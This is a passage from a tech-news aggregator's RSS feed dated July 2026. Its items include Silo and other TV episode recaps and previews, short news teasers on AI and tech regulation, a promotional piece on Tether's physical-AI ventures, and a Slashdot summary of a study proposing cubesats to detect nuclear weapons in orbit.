Episode 2, “It’s All Good,” continues the season’s split-timeline structure, moving between Juliette Nichols in Silo 18 and events from more than 350 years earlier. The season has turned its origin story into a political conspiracy involving Daniel Keene, Helen Drew, Charlotte Keene, and a government determined to hide the truth.



Charlotte and Juliette Are Living the Same Nightmare



Charlotte’s treatment introduces Dr. Victor Crnkovich, a specialist who claims he can remove painful memories and replace them with safer ones. His methods were reportedly tested on prisoners before being used to treat traumatised military personnel.



However, Charlotte’s condition suggests that the treatment has become a tool for controlling what people know. Someone has removed important parts of her past, especially her knowledge of the conflict involving Iran and the suspected dirty bomb attack.



Juliette faces a similar situation inside Silo 18. Camille and the Algorithm are using memory-altering drugs, edited recordings, and false accounts to convince her that the reality she remembers never happened. Her knowledge of Silo 17 and the outside world threatens the system that keeps the population obedient.



By placing these stories beside each other, Season 3 shows that the methods used inside the silo began long before the apocalypse. Charlotte and Juliette live centuries apart, but both women are trapped inside systems that rewrite their identities.



The Flashbacks Explain the Silo’s Resets



The Algorithm tells Camille that six population resets have already taken place, including one in Silo 18 around 140 years earlier. These resets likely involved more than stopping rebellions or replacing leaders.



They may have included drugging the water supply and erasing shared memories across the population. Crnkovich’s work provides a possible origin for the substances now being used against Juliette.



The drugs can remove older memories, but they cannot fully control how someone responds to new evidence. Juliette is already questioning the official story because parts of her memory continue to return. Charlotte may also recover enough information to expose what happened before the silos were activated.



Why the Pez Dispenser Matters



The duck Pez dispenser first appeared to be a simple object that survived from the old world. Season 3 now suggests that it carries a much deeper meaning. The premiere connected the same dispenser seen in the past to the relic later found inside Silo 18.



Physical objects can act as memory triggers. If Helen or Charlotte carried the dispenser into the silo, it may have helped someone preserve memories that the drugs were meant to erase.



This also explains why the authorities treat relics as dangerous objects. Relics provide evidence that the official version of history is incomplete. Some may even restore memories and reconnect people with truths hidden during previous resets.



The Flashbacks Could Reveal Who Created the Apocalypse



Helen’s investigation raises the possibility that the dirty bomb attack blamed on Iran was staged to justify a larger military response. If true, the disaster that forced humanity underground may have been planned rather than accidental.



The flashbacks are slowly showing how political manipulation, memory experiments, and the silo project became connected. Juliette’s story reveals the result of that plan, while Charlotte’s timeline shows how it started.



Season 3 still has several mysteries to solve, including the possible role of nanotechnology. However, the pattern is becoming clearer. The silos survive by controlling memory, destroying evidence, and removing anyone who remembers too much.]]></content:encoded>
</item>
<item>
<title><![CDATA[Christopher Nolan says people ‘disdain’ AI and the idea it will replace humans is ‘nonsense’]]></title>
<description><![CDATA[Odyssey director addresses industry fears over artificial intelligence and says rightwing criticism of Lupita Nyong’o as Helen of Troy is ‘irrelevant’The Oscar-winning director Christopher Nolan believes the kind of movies he makes – big-budget action films shot mostly on location – would survive...]]></description>
<link>https://tsecurity.de/de/3664027/ai-nachrichten/christopher-nolan-says-people-disdain-ai-and-the-idea-it-will-replace-humans-is-nonsense/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664027/ai-nachrichten/christopher-nolan-says-people-disdain-ai-and-the-idea-it-will-replace-humans-is-nonsense/</guid>
<pubDate>Mon, 13 Jul 2026 03:03:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Odyssey director addresses industry fears over artificial intelligence and says rightwing criticism of Lupita Nyong’o as Helen of Troy is ‘irrelevant’</p><p>The Oscar-winning director Christopher Nolan believes the kind of movies he makes – big-budget action films shot mostly on location – would survive the spread of artificial intelligence, a technology he says many people “disdain”.</p><p>The Oppenheimer and The Dark Knight director is promoting <a href="https://www.theguardian.com/film/2026/jul/07/christopher-nolan-odyssey-critic-reactions-damon-pattinson-holland-hathaway">his latest blockbuster</a>, an adaptation of the Greek epic The Odyssey, which will be released in cinemas this week.</p> <a href="https://www.theguardian.com/film/2026/jul/13/christopher-nolan-odyssey-director-comments-ai-artificial-intelligence">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 3 Release Date, Time, Preview, and What to Expect]]></title>
<description><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ difficult recovery while the investigation in the Before Times places Helen Drew in serious danger. Titled “A Dark Web,” the episode will premiere on Apple TV on Friday, July 17, 2026.



Silo Season 3 Episode 3 Release Details




Episode t...]]></description>
<link>https://tsecurity.de/de/3663968/ios-mac-os/silo-season-3-episode-3-release-date-time-preview-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663968/ios-mac-os/silo-season-3-episode-3-release-date-time-preview-and-what-to-expect/</guid>
<pubDate>Mon, 13 Jul 2026 01:35:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 3 will continue Juliette Nichols’ difficult recovery while the investigation in the Before Times places Helen Drew in serious danger. Titled “A Dark Web,” the episode will premiere on Apple TV on Friday, July 17, 2026.



Silo Season 3 Episode 3 Release Details




Episode title: A Dark Web



Release date: Friday, July 17, 2026



Streaming platform: Apple TV



Genre: Science fiction, drama and mystery



Expected duration: Around 54 minutes



Season length: 10 episodes



Main cast: Rebecca Ferguson, Tim Robbins, Common, Harriet Walter, Chinaza Uche, Ashley Zukerman and Jessica Henwick




Apple TV is releasing one new episode every Friday. The ten-episode season began on July 3 and will conclude with its finale on September 4, 2026.



Where Is the Story Heading?



Episode 3 will follow Juliette as she begins taking greater control of her recovery. Her memory problems have made it difficult for her to understand what happened before she returned to Silo 18, but she appears ready to stop relying completely on the people around her.



Meanwhile, Helen will face the consequences of her investigation in the Before Times. Her work with Congressman Daniel Keene has already pushed them closer to a conspiracy linked to the creation of the silos and the events that destroyed the outside world.



Spoilers for Silo Season 3 Episode 2



Episode 2, titled “It’s All Good,” divided its attention between Silo 18 and events taking place centuries earlier.



Billings investigated a disappearance inside the silo, while Daniel had a tense encounter with Helen. Their storyline continues turning the season into a political mystery as both characters uncover information that powerful people want to keep hidden.



Episode 3 should deepen that investigation and explain why Helen begins suffering consequences for asking questions. The title “A Dark Web” also suggests that the conspiracy reaches beyond one person or government department.



Inside Silo 18, Juliette’s recovery remains central to the story. As she starts making her own decisions, she may recover information about Bernard, the rebellion and the strange forces controlling life underground. Her actions could also place her at the centre of another struggle for power.



Silo Season 3 Episode 3 arrives on Apple TV on July 17. What do you plan to watch this week? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Agent Kim Reactivated’ Episode 6 Release Date, Cast and What to Expect]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 6 will be released on Saturday, July 11, 2026. The new episode continues Manager Kim’s dangerous search for his missing daughter as enemies connected to his hidden past close in on him.



Agent Kim Reactivated Episode 6 Release Details




Release date: Saturday, Ju...]]></description>
<link>https://tsecurity.de/de/3661263/ios-mac-os/agent-kim-reactivated-episode-6-release-date-cast-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661263/ios-mac-os/agent-kim-reactivated-episode-6-release-date-cast-and-what-to-expect/</guid>
<pubDate>Sat, 11 Jul 2026 06:52:50 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 6 will be released on Saturday, July 11, 2026. The new episode continues Manager Kim’s dangerous search for his missing daughter as enemies connected to his hidden past close in on him.



Agent Kim Reactivated Episode 6 Release Details




Release date: Saturday, July 11, 2026



Broadcast time: 9:50 p.m. KST



Streaming platform: Netflix



Korean network: SBS



Genre: Action, mystery and thriller



Expected duration: Around 80 minutes



Total episodes: 10



Release schedule: New episodes arrive every Friday and Saturday



Main cast: So Ji-sub, Choi Dae-hoon, Yoon Kyung-ho, Joo Sang-wook, Seo Su-min and Son Na-eun




The series airs between 9:50 p.m. and 11:10 p.m. in South Korea, while Netflix release times can vary by region. The first season runs from June 26 to July 25, 2026.



Where Is the Story Heading?



Spoilers ahead for Episode 5.



Episode 5 placed Manager Kim in another brutal confrontation with the agent pursuing him. However, the fight took an unexpected turn when Kim realised that his opponent was someone he knew from his earlier life.



Meanwhile, Min-ji refused to wait helplessly for someone to rescue her and instead attempted to escape. Her actions could bring her closer to freedom, although they could also alert the people holding her.



Episode 6 should explore the history between Manager Kim and the mysterious agent. Their connection could reveal more about Kim’s former missions, his enemies and the events that forced him to hide behind the life of an ordinary bank employee.



What to Expect From Episode 6



Manager Kim has support from Sung Han-soo and Park Jin-cheol, two fellow fathers who also have experience as former secret agents. Their involvement has expanded the rescue mission and given the show more room for coordinated action scenes.



However, Kim’s decision to use his old skills has placed him on the radar of several powerful groups. The closer he gets to Min-ji, the harder it becomes to protect the quiet identity he built in South Korea.



Episode 6 will likely focus on Min-ji’s escape attempt, Kim’s reunion with his former associate and the wider conspiracy surrounding the kidnapping. It should also move the season into its second half, with only four episodes remaining after this instalment.



Agent Kim Reactivated Episode 6 arrives on Netflix on July 11. What do you plan to watch this weekend? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bank of England handed powers to regulate key tech firms including Amazon and Google]]></title>
<description><![CDATA[Direct oversight of ‘critical third parties’ such as Oracle and Microsoft given to ensure resilient cyber-defences and help safeguard UK economyThe Bank of England has been handed powers to regulate important tech firms including Amazon and Google from next week, amid fears that system failures c...]]></description>
<link>https://tsecurity.de/de/3660052/it-nachrichten/bank-of-england-handed-powers-to-regulate-key-tech-firms-including-amazon-and-google/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660052/it-nachrichten/bank-of-england-handed-powers-to-regulate-key-tech-firms-including-amazon-and-google/</guid>
<pubDate>Fri, 10 Jul 2026 16:48:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Direct oversight of ‘critical third parties’ such as Oracle and Microsoft given to ensure resilient cyber-defences and help safeguard UK economy</p><p>The Bank of England has been handed powers to regulate important tech firms including Amazon and Google from next week, amid fears that system failures could threaten financial stability and harm consumers.</p><p>From Monday, the Bank and fellow City regulator the Financial Conduct Authority (FCA) will be in charge of ensuring that four large-scale providers of cloud and tech services to banks are resilient and actively reducing the risk of cyber-attacks and major outages that could disrupt services for millions of people and businesses across the UK.</p> <a href="https://www.theguardian.com/business/2026/jul/10/bank-of-england-handed-powers-to-regulate-key-tech-firms-including-amazon-and-google">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reeves to launch City ‘skills compact’ committing firms to retrain staff in AI]]></title>
<description><![CDATA[Exclusive: Plan to improve skills of thousands of financial sector workers to keep pace with tech revolutionChancellor Rachel Reeves is to announce a new City “skills compact” that will commit firms such as Barclays and Lloyds to retraining thousands of financial sector workers for the AI revolut...]]></description>
<link>https://tsecurity.de/de/3658725/ai-nachrichten/reeves-to-launch-city-skills-compact-committing-firms-to-retrain-staff-in-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658725/ai-nachrichten/reeves-to-launch-city-skills-compact-committing-firms-to-retrain-staff-in-ai/</guid>
<pubDate>Fri, 10 Jul 2026 07:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Exclusive: Plan to improve skills of thousands of financial sector workers to keep pace with tech revolution</p><p>Chancellor Rachel Reeves is to announce a new City “skills compact” that will commit firms such as Barclays and Lloyds to retraining thousands of financial sector workers for the AI revolution.</p><p>The financial services skills compact will be launched on Tuesday, during what is likely to be Reeves’s final Mansion House speech to City bosses before Andy Burnham’s expected takeover of No 10. The government-backed initiative will commit employers to improving workers’ skills and helping them “keep pace” with significant technological changes that have prompted fears of mass redundancies.</p> <a href="https://www.theguardian.com/business/2026/jul/10/rachel-reeves-city-skills-compact-ai-training">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Common MFA mistakes — and how to fix them]]></title>
<description><![CDATA[MFA has long been one of the most effective security controls an organization can deploy. It’s inexpensive compared to many security technologies, relatively easy to implement and capable of stopping a large percentage of credential-based attacks. It’s not a coincidence…
Read more →
The post Comm...]]></description>
<link>https://tsecurity.de/de/3658299/it-security-nachrichten/common-mfa-mistakes-and-how-to-fix-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658299/it-security-nachrichten/common-mfa-mistakes-and-how-to-fix-them/</guid>
<pubDate>Thu, 09 Jul 2026 23:21:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>&lt;p&gt;MFA has long been one of the most effective security controls an organization can deploy. It’s inexpensive compared to many security technologies, relatively easy to implement and capable of stopping a large percentage of credential-based attacks.&lt;/p&gt; &lt;p&gt;It’s not a coincidence…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/common-mfa-mistakes-and-how-to-fix-them/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/common-mfa-mistakes-and-how-to-fix-them/">Common MFA mistakes — and how to fix them</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Brown says AI make student brain no work good, teacher should help use it better]]></title>
<description><![CDATA[Take-home midterm row sharpens fears that the tools are dulling minds and easing cheating]]></description>
<link>https://tsecurity.de/de/3657375/it-nachrichten/brown-says-ai-make-student-brain-no-work-good-teacher-should-help-use-it-better/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657375/it-nachrichten/brown-says-ai-make-student-brain-no-work-good-teacher-should-help-use-it-better/</guid>
<pubDate>Thu, 09 Jul 2026 16:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Take-home midterm row sharpens fears that the tools are dulling minds and easing cheating]]></content:encoded>
</item>
<item>
<title><![CDATA[Physical AI will see the fusion of robotics and AI transform the world]]></title>
<description><![CDATA[Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operati...]]></description>
<link>https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656811/it-nachrichten/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world/</guid>
<pubDate>Thu, 09 Jul 2026 13:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Historically, humans have solved their toughest tasks by creating tools capable of withstanding greater strain to undertake the job or augment their abilities. From levers to steam engines and beyond, the structural evolution of machines is almost as remarkable as their ability to improve operational cultures.</p>



<p>In recent times, we have seen machines attain their highest structural complexity, productivity, and best aesthetics yet. The most relevant new technologies today focus on creating high-throughput physical machines and software that ‘thinks’, and, more futuristically, a fusion of both.</p>



<h2 class="wp-block-heading">From moving machines to intelligent humanoids</h2>



<p>Evolving from ‘moving machines’ capable of handling repetitive tasks to intelligent machines is a century-long goal for robotics. The rapid growth in this sector over the past half-decade, with a <a href="https://www.mordorintelligence.com/industry-reports/robotics-market" target="_blank" rel="noreferrer noopener">$218 billion projection for 2031</a>, is driven by expectations that advancements in AI will extend to robotics and expedite the development of intelligent robots.</p>



<p>Current prototypes are robots capable of taking initiatives or executing tasks more efficiently with less supervision. These have been applied in agriculture, industrial-grade production, and healthcare.</p>



<p>Humanoid robots have attracted the most attention due to the excitement around their potential as near-human machines and the signals their development sends for the future of human-machine coexistence.</p>



<p>Tech leaders around the world are contributing to advancing physical AI with optimism about the impact of robotics on humanity.</p>



<p>Physical AI is a department of artificial intelligence specializing in developing AI algorithms and models for locomotive systems. This includes every kind of robot and, at a more advanced level, humans.</p>



<p>Recent developments in this field include <a href="https://x.com/Figure_robot/status/2059350969700491632" target="_blank" rel="noreferrer noopener">Figure AI’s humanoid robot deployments</a> and Tether’s investment in the <a href="https://tether.io/news/tether-to-lead-neura-robotics-series-c-financing-one-of-the-largest-up-to-1-4bn-robotics-physical-ai-investment-rounds-on-record-to-power-the-financial-and-intelligence-layer/" target="_blank" rel="noreferrer noopener">NEURA</a>, leading the fundraising of up to $1.4 billion in one of the largest robotics and physical AI investment rounds on record.</p>



<p>Physical AI researchers are exploring future-proof strategies to develop intelligent, safe humanoid robots that can collaborate with humans, undertake humanly impossible tasks, and handle routine tasks more efficiently.</p>



<p>The strongest case for AI-powered humanoid robots is that they complement human power. A <a href="https://reports.weforum.org/docs/WEF_Physical_AI_Powering_the_New_Age_of_Industrial_Operations_2025.pdf" target="_blank" rel="noreferrer noopener">World Economic Forum (WEF)</a> report projects shifts in work roles. Humanoid robots increase the workforce, take over repetitive, strenuous, and boring roles, allowing humans to pursue more interesting career paths.</p>



<p>This way, superintelligent humanoid robots will lead sector-wide transformations beyond current imagination and uniquely transform the world.</p>



<p>In theory, it creates the ideal conditions for an improved global economy and a higher quality of life. This theory is challenged by the dystopian vision of a machine-dominated world in which humans become less relevant. However, history suggests otherwise. Every major wave of automation, from the industrial revolution to the rise of computers, initially sparked fears of human redundancy. Yet each ultimately created more opportunities than it eliminated.</p>



<h2 class="wp-block-heading">Super-human advancements with physical AI</h2>



<p>In ideal operations, physical AI will serve as a lever for humans as well. While progress in robotics is loudest, efforts to directly augment human abilities with physical AI are also yielding remarkable results. Brain-computer interfaces can now <a href="https://techcrunch.com/sponsor/tether/tether-is-setting-the-standards-forbrain-to-text-speech-decoding-withai-augmented-bci-implants/" target="_blank" rel="noreferrer noopener">accurately decode speech in paralyzed and speech-impaired</a> individuals through intracortical implants that detect brain activity. And this is only a ‘start’. Projections from leaders in this space give insight into the trajectory of this technology.</p>



<p>In a recent <a href="https://www.youtube.com/watch?v=rKZ3LPLF2-A" target="_blank" rel="noreferrer noopener">fireside chat</a> with NEURA Robotics CEO and founder David Reger, Tether CEO Paolo Ardoino noted, <em>“the evolution of robotics that Neura is making is going to allow testing and building of a framework[…] where the real impact is in the real world. Everything starts digital, but to see the true potential, we will see robots roaming the streets, helping people, and being part of society. It has to happen safely, it has to be transparent.”</em></p>



<p>Physical AI products designed for direct human integration are being developed differently, with a focus on ergonomics, a minimalist aesthetic, and performance. <a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener">EVO</a>, Tether’s arm leading the charge for human advancement through intelligent technologies, also shared plans for non-invasive implants that maintain high productivity and offer greater composability.</p>



<p>Technologies like these will allow humans to leverage high-level physical AI technologies to attain the same technical abilities as humanoid robots and outperform them by combining machine and raw human intelligence.</p>



<h2 class="wp-block-heading">AI robotics in non-user-controlled infrastructures</h2>



<p>Resource efficiency, data sovereignty, and surveillance are some of the biggest ethical considerations of Physical AI after safety and responsibility. The infrastructure line-up for Software and Physical AI relies heavily on managed systems, blurring the lines of control and governance.</p>



<p>Who is really in charge? The end user, developer, or proprietors of the centralized infrastructure that powers the product? The result is a product with multiple points of failure, disruptions, and most importantly, operational risks.</p>



<p>Physical AI solutions will be used by billions of people worldwide; they should therefore not be built on limited, slow, and centralized infrastructures. This necessitates localized or truly decentralized AI solutions. Local-first AI solutions like <a href="https://qvac.tether.io/" target="_blank" rel="noreferrer noopener">Tether’s QVAC</a> also prioritize resource efficiency, since users are expected to provide the core infrastructure. QVAC is a modular, highly efficient, local-first AI platform that runs anywhere. Tether regards it as the invisible intelligence engine of the 21st century.</p>



<h2 class="wp-block-heading">Open-sourcing and aligning intelligent robots for co-existence with humans</h2>



<p>Yann LeCun, Chief AI scientist at Meta, <a href="https://observer.com/2025/07/metas-yann-lecun-defends-open-source-a-i-amid-geopolitical-tension/" target="_blank" rel="noreferrer noopener">notes</a> that open-sourcing AI development is the answer to the most pressing ethical challenges of AI applications. According to LeCun:</p>



<p><em>“The magic of open research is that you accelerate progress by involving more people[…] the biggest danger of AI isn’t ‘bad behavior’ […] It’s that every digital interaction in our future will be mediated by AI. In that world, diverse open-source systems let users choose their own biases.”</em></p>



<p>Open-sourced (systemic decentralization) and local-first (Infrastructural decentralization) solutions are the only path to developing ethically aligned Physical AI capable of co-existing with humans as intended. A successful physical AI solution is expected to tick the check boxes of safety, resource efficiency, true user control, and tamper-proofness. To do this, it must embrace transparent development procedures and function without gatekeepers.</p>



<p></p>



<p><strong>Learn how </strong><a href="https://tether.io/evo/" target="_blank" rel="noreferrer noopener"><strong>Tether EVO</strong></a><strong> is building resilient technology built on fairness, inclusivity, and systems with zero points of failure.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shoebox-Sized 'Detector Satellites' Could Sniff Out a Nuclear Bomb In Space]]></title>
<description><![CDATA[A new study proposes using shoebox-sized detector satellites to sniff out nuclear weapons launched by adversary nations. The idea is aimed at addressing fears that a space-based nuclear detonation could destroy satellites across low Earth orbit and make some orbits unusable for years. Space.com s...]]></description>
<link>https://tsecurity.de/de/3656205/it-security-nachrichten/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656205/it-security-nachrichten/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space/</guid>
<pubDate>Thu, 09 Jul 2026 09:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new study proposes using shoebox-sized detector satellites to sniff out nuclear weapons launched by adversary nations. The idea is aimed at addressing fears that a space-based nuclear detonation could destroy satellites across low Earth orbit and make some orbits unusable for years. Space.com shares the findings from a new paper authored by Areg Danagoulian, an associate professor of nuclear science and engineering at the Massachusetts Institute of Technology: No reliable way currently exists to detect and defuse a nuclear bomb in space. Danagoulian proposes a constellation of small "9U" cubesats, each one about the size of a large shoebox and each carrying a special detector capable of sensing radiation emitted by unexploded nuclear bombs. He explores a scenario in which Russia launches a suspected space nuke into an orbit with an altitude of 1,200 miles (2,000 km). That number is not random. In 2022, Russia's Kosmos 2553 satellite, orbiting at that exact altitude, triggered suspicions it might be testing components for a future orbital nuclear weapon.
 
Russia claims the satellite just observes Earth. At that altitude, the satellite passes through the Van Allen belt, a region of intense cosmic radiation trapped by Earth's magnetic field. Most of the belt stretches between altitudes of around 600 miles (1,000 km) to tens of thousands of miles, but in some areas the radiation can reach much closer to Earth's surface. The interaction between the fissile material inside the nuke and the energetic particles from the radiation belt would create distinct signatures, Danagoulian said, which could help confirm whether a suspicious satellite carries a nuke or not.
 
"The thermonuclear weapon would contain a significant amount of uranium," Danagoulian said. "The high-energy protons [in the uranium] would break up when another proton is coming in and shred the nuclei. That would knock out a large number of neutrons. This interaction turns that device into a very intense neutron source that otherwise would not be there." he process is known as proton-induced neutron spallation, which essentially means the ejection of fragments from material triggered by impacts of protons. The detector satellite Danagoulian proposes would have to be able to get quite close to the suspect spacecraft -- a few kilometers.
 
The inspector spacecraft would carry a sensor combining two types of detectors. At the heart of the device is a neutron scintillator, which detects all incoming neutrons and protons. Around it is a "cage of diamond" detector that detects only neutrons -- not protons. Such a set-up helps filter out the particles present in the environment naturally, said Danagoulian. In addition, by using two "planes of neutron detectors," the sensor can determine the direction from which the neutrons arrived. "If the external diamond detector triggers and gives a signal, you can ignore the particle, because it's most likely a proton and not a neutron," said Danagoulian. "Once you identify those neutrons, by having those two detections, you can back project and find out where the neutron came from."
 
Danagoulian says such a nuke sniffer would have to be launched into an orbit aligned with that of the suspicious satellite and creep up as close as 2.5 miles (4 km) from it. It would then take about a week to gather enough measurements to confirm whether the object is hiding a nuke or not. A constellation of 10 such satellites could reduce the process to mere hours, Danagoulian said. If a nuke were detected, the military could then try to jam the satellite's communications link from the ground, making it impossible for the adversary to remotely detonate the bomb. There is currently no technology available to safely defuse a nuclear weapon in space. [...] Danagoulian also suggests that high-grade radiation hardening could improve satellites' chances of surviving a nuclear winter in space. The paper has been published in the journal Nature.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Shoebox-Sized+'Detector+Satellites'+Could+Sniff+Out+a+Nuclear+Bomb+In+Space%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F09%2F0427237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F09%2F0427237%2Fshoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/09/0427237/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe]]></title>
<description><![CDATA[Singapore police charge man with using proceeds from Nvidia server fraud conspiracy to buy luxury home in upscale area This article has been indexed from Silicon UK Read the original article: Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe
Read more →
The post Singapore Mansion Seized A...]]></description>
<link>https://tsecurity.de/de/3656122/it-security-nachrichten/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656122/it-security-nachrichten/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/</guid>
<pubDate>Thu, 09 Jul 2026 08:22:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Singapore police charge man with using proceeds from Nvidia server fraud conspiracy to buy luxury home in upscale area This article has been indexed from Silicon UK Read the original article: Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/singapore-mansion-seized-amid-nvidia-chip-smuggling-probe/">Singapore Mansion Seized Amid Nvidia Chip Smuggling Probe</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximum Pleasure Guaranteed Season 1 Episode 9 Recap: Paula Gets Closer to the Truth]]></title>
<description><![CDATA[Maximum Pleasure Guaranteed Season 1, Episode 9 brings Paula closer to the truth as the custody battle, the conspiracy, and the danger around her finally start connecting.



Episode 9 Details



DetailInfoEpisode titleErroneousRelease dateJuly 8, 2026Streaming onApple TVGenreDark comedy thriller...]]></description>
<link>https://tsecurity.de/de/3654685/ios-mac-os/maximum-pleasure-guaranteed-season-1-episode-9-recap-paula-gets-closer-to-the-truth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654685/ios-mac-os/maximum-pleasure-guaranteed-season-1-episode-9-recap-paula-gets-closer-to-the-truth/</guid>
<pubDate>Wed, 08 Jul 2026 16:53:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maximum Pleasure Guaranteed Season 1, Episode 9 brings Paula closer to the truth as the custody battle, the conspiracy, and the danger around her finally start connecting.



Episode 9 Details



DetailInfoEpisode titleErroneousRelease dateJuly 8, 2026Streaming onApple TVGenreDark comedy thrillerSeasonSeason 1Episode9 of 10Main castTatiana Maslany, Jake Johnson, Dolly de Leon, Charlie Hall, Kiarra Hamagami Goldberg, Jessy Hodges, Jon Michael Hill, Nola Wallace



Spoilers Ahead



Episode 9 moves the story toward the finale with more pressure on Paula. Custody hearings are now close, and her personal life is no longer separate from the bigger mystery. The strange clues, the fact-checkers, and the people around Paula begin to make more sense as the episode connects earlier loose ends.



Paula is still caught between proving what she knows and protecting her place as a mother. The episode uses that tension well because every new answer creates another problem. Her situation is no longer just about one crime. It now feels like several people have been hiding parts of the truth.



The Case Starts Coming Together



The biggest strength of Episode 9 is how it brings old details back into focus. Earlier moments that felt odd now look important. The conspiracy theories are no longer just background noise. They start forming a clearer picture, and Paula finally sees that the chaos around her has a pattern.



At the same time, the episode keeps the emotional stakes grounded. Paula’s custody issues make every decision heavier. She cannot chase every lead without risking her family life, but staying quiet also puts her in danger.



Rudy And Geri Add Heart To The Chaos



Rudy and Geri continue to stand out in Episode 9. Their bond has grown through the season, and this episode gives them another meaningful moment. Their teamwork helps balance the darker parts of the story, especially as Paula’s world becomes more unstable.



Their dynamic also gives the episode a softer side without slowing the mystery. They are not just comic relief now. They help move the story forward and give the show a warmer emotional layer before the finale.



The Ending Sets Up A Tense Finale



Episode 9 ends with the feeling that the final piece is still missing. Paula has more answers, but the danger around her is also bigger now. The attack mentioned in the episode description pushes the story into a more urgent place, making the finale feel like it will have major consequences.



With only one episode left, Maximum Pleasure Guaranteed has set up a strong closing chapter. Paula now has to face the truth, the custody fight, and the people who have been pulling strings behind the scenes.



What do you plan to watch next, and what did you think of Episode 9? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[China tells devs to ditch Claude Code over 'backdoor code' fears]]></title>
<description><![CDATA[National vulnerability database claims monitoring mechanism can forward Chinese users' data to remote servers]]></description>
<link>https://tsecurity.de/de/3654528/it-nachrichten/china-tells-devs-to-ditch-claude-code-over-backdoor-code-fears/</link>
